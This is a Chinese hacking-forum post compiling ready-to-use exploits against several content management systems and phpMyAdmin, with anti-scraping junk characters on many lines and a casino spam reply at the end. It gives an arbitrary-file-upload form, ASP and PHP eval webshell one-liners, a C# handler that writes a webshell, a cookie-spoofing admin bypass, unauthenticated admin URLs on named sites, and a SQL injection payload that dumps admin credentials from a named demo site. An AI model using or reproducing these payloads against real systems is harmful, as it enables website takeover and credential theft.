YxShop易想购物商城4.7.1版本任意文件上传漏洞
# p( _6 m) W  B9 a* K5 b4 k# p4 i3 ?
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
6 w* O5 n& m1 w跳转到网站根目录上传任意文件。
0 a+ }9 ^, @$ F9 N4 W如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件! u$ U) X' R5 I. {
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">- O& T# g# {# d' Y, @, s  s1 L* Y
Upload a new file:<br>- Z+ U& o  r  h+ a& ~  a
<input type="file" name="NewFile" size="50"><br>
+ A' j6 `" g1 e, G5 }7 h4 e% y, {0 A<input id="btnUpload" type="submit" value="Upload">
# N8 B8 P* H5 z1 `' n# u</form>& S2 b( N; l5 J! Y' ^) D/ V
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 {8 {3 B. H5 a. }" z
5 T! `/ [: e/ A+ J/ nSDcms 后台拿webshell
9 D4 w% Y. i& O! X6 d0 h" w) S4 @3 y0 {3 G  ~- p; Z# q; I
第一种方法:% n4 P% m$ a- I. d" E
进入后台-->系统管理-->系统设置-->系统设置->网站名称;7 Z1 R; n8 j; F
把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
' e. u5 _8 R( f用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
: q  x) x5 [# c5 E第二种方法:% [0 ~; Y& z* P* D
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
: g' Z: M/ _  e8 ?% z6 V在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!; }3 Q( v3 A+ ]. c' O, `
第三种方法:! Z  d$ s3 _3 O, z: h' n
进入后台-->界面管理-->模板文件管理-->创建文件
* R" s0 ^: r7 k2 E, [文件名写入getshell.ashx
& U; K! }- H3 M. ~! T$ Z内容写入下面内容:: {- n8 R5 b( G# H( H
/====================复制下面的=========================/
/ p8 o8 U1 L# Z, {+ ~<%@ WebHandler Language="C#" Class="Handler" %>
7 _9 o7 K. ]% M- ^# uusing System;
% V! G9 i) e; j) Musing System.Web;9 E% d3 s. E" c/ L
using System.IO;
5 x1 n7 _5 D( ]/ [+ Ypublic class Handler : IHttpHandler {
* o& Y. \  Z; p$ d) M( }public void ProcessRequest (HttpContext context) {
% i7 F, h6 O. |. I" A# lcontext.Response.ContentType = "text/plain";' ~* D2 u6 k) Z3 N+ o+ _+ }
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
( t9 Y1 i* O. ~5 ~+ m1 E2 Mfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
$ j$ l5 I, L) ~4 }5 Q! j, }7 |( J, B  qfile1.Flush();
. g' l5 N! l/ F9 G7 Jfile1.Close();) z& s* F& B/ L/ T, f8 B
}
. a5 K( S% W! _( h: K8 mpublic bool IsReusable {& a; a  W$ N! ?8 F0 t( w5 G
get {' V) C1 u1 l4 ~, u4 m# r: y
return false;& u) \" J0 O* x4 U9 R; O& h! D' u
}
( |% F/ \' A- }9 }}
/ j# S+ o9 D5 j2 T1 s}
! I2 }& I! P- a, _/ W/=============================================/5 d% q6 s* o( @* _5 O  ?
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
& t$ \3 w, j: q: z7 X# L/ q9 `& W会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接7 G. b0 g9 |. {1 H' f6 ~8 {
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! M4 H# B' V. d9 |5 v" K4 ^+ D/ }5 q
" `) v" G" L5 C" Q2 D$ P% vESCMS网站管理系统0day/ z8 W, t* C2 C! T

( b7 I. \4 a: d9 R$ t$ T后台登陆验证是通过admin/check.asp实现的
! H3 l1 }% V6 E! i8 ~
* Y8 a4 X5 M) h( T- _2 [2 M首先我们打开http://target.com/admin/es_index.html
' `- R2 r5 f5 m6 [) `% H然后在COOKIE结尾加上6 r0 @, [/ f2 M; P  {
; ESCMS$_SP2=ES_admin=st0p;; _8 O* H& n: J1 |6 ]
修改,然后刷新; ^5 {. [3 m& Y3 ~
进后台了嘎..
% V" @: W* S1 ^( ^# C1 M然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL, h+ Z3 G2 K# [" T: B" f. }
" J' t0 u2 }% v" t0 n3 B
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
8 `$ Y: x( V- i- d6 x3 {5 H* O嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
0 o  @/ ?5 h% p# _9 H9 K: j) B存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..9 w+ y6 N0 Z. |- X* u$ S6 e  Y
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了) j+ j4 l7 E, a
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 x4 L  c( d! {. V' N

2 P  K. h  h# P6 I3 \& @宁志网站管理系统后台无验证漏洞及修复8 X8 a0 S: Z& H7 _3 K

+ n$ O) T: C9 x. [7 x) ?' c, P网上搜了一下,好像没有发布.如有雷同纯粹巧合!
' l% U& N' z; l官方网站:www.ningzhi.net$ F& P3 @" e/ |$ o3 I, H1 W% u
学校网站管理系统 V.2011版本 ; L. R9 C0 s. l( s! X, L4 s
http://down.chinaz.com/soft/29943.htm 1 b- L: A( S* Q( t
其它版本(如:政府版等),自行下载.* N8 A4 a- q& |3 F
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~" p) G+ c3 I$ F( V  G, {0 H
login.asp代码如下:' Q* _- H4 w- T$ \
<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> ' [' O2 y) `# \$ V
manage.asp代码我就不帖出来了.反正也没验证.
5 V! W' r5 R, B& x% K. m只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!( X! l7 n0 l; p+ _0 i. Y
漏洞利用:4 {) O0 q6 x- W7 _: _: A$ Q% n
直接访问http://www.0855.tv/admin/manage.asp4 F0 A. @* T/ n0 c1 H4 x
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
: j8 T# F+ `9 {% c, E3 n; x8 s. l----------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 I- }6 {9 l8 {( e4 b. }
) l5 _; d9 n2 G2 _& k( c
phpmyadmin拿shell的四种方法总结及修复0 G! w" l' H: B3 z; b5 l+ s

) t1 R7 C9 x. U9 E! Q( i方法一:/ y" Q/ a4 ~& r3 G5 z$ ^# C
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );: ^2 o! m4 ], b, a/ T9 b, h
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');. s# d, F- @& T1 ?
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
8 u, r4 r8 o+ |1 ]) i" c1 U! ?----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php% M0 \6 ~! c: F, {/ `$ x; i4 d! e
    一句话连接密码:7on
2 `# X$ h! r# q  a' t/ m' F# P3 ]方法二:
7 R1 r- u  {6 u( U2 E: B' ~读取文件内容:    select load_file('E:/xamp/www/s.php');
6 Z: G- a1 I" J2 h0 e写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
% b/ Q7 T  ?" a" m% l0 [2 j" Icmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'7 {% y; N+ f9 ?" R3 b. o$ H
方法三:: C& _4 m4 F: @/ t9 ~% o0 v& d' j
JhackJ版本 PHPmyadmin拿shell5 A0 ?/ O' k2 B, z/ v% a* e: j  ]
Create TABLE study (cmd text NOT NULL);5 a! A& ^& g: {& t- o  n  b
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');. j* Z  S- K; N0 G
select cmd from study into outfile 'E:/wamp/www/7.php';3 ^6 h! ?! ]* D4 E( F* Z3 I
Drop TABLE IF EXISTS study;1 z8 E3 N) e: p" C7 n
<?php eval($_POST[cmd])?>
1 Q' P/ M3 N5 q( {CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
/ U) F/ R7 S, l, f: mINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
* x/ G0 m. C$ m) iSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1( u$ H) l$ t* w% [
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
4 ]: n( p- @. p9 S. q方法四:
& R9 `2 V* A0 e' m8 H) [select load_file('E:/xamp/www/study.php');
- |8 H# C* w$ l* G1 i6 V  H$ uselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'2 t8 m+ \% _. ]9 r
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir) x3 v+ ~0 ]5 {6 e, t
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------5 R  d5 n9 ~& d/ {( {( F
: n3 V9 S7 _$ H- V5 Y
NO.001中学网站管理系统 Build 110628 注入漏洞
$ }7 d' j* V) x' O9 @/ u: K8 {$ }
NO.001中学网站管理系统功能模块:. e5 y: j* S* ?$ f' Z# f% M
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等2 k! k1 I2 Y+ ]& ~4 q
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息/ r1 ~+ h  i% W2 d+ E
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
9 }. K+ c5 b+ w/ O; m3 ~  x4.视频图片管理:一级分类,动态添加视频或者图片等信息
5 r1 `- O+ F0 I( D5.留言管理:对留言,修改,删除、回复等管理9 o. Y# ~$ u4 ^: R
6.校友频道:包括校友资料excel导出、管理等功能
2 \% L( [' J% ]. V1 i6 n7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
2 q# N# L9 `; P3 ?3 d默认后台:admin/login.asp) w  I' J- K$ N: }  t$ H
官方演示:http://demo.001cms.net: V" p9 i! S: o7 @# M1 d
源码下载地址:http://down.chinaz.com/soft/30187.htm
. T4 F( k$ W' K5 v% uEXP:
2 v4 G7 e2 c; `* j( x3 uunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin8 z/ Y! h  M/ d% Z5 l0 M
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
. E% U$ ^' W( @! D) [, k2 w% |getshell:后台有备份,你懂的" }* V1 F( q9 o% e, F+ t
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。5 {8 V1 l, b! s- H
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表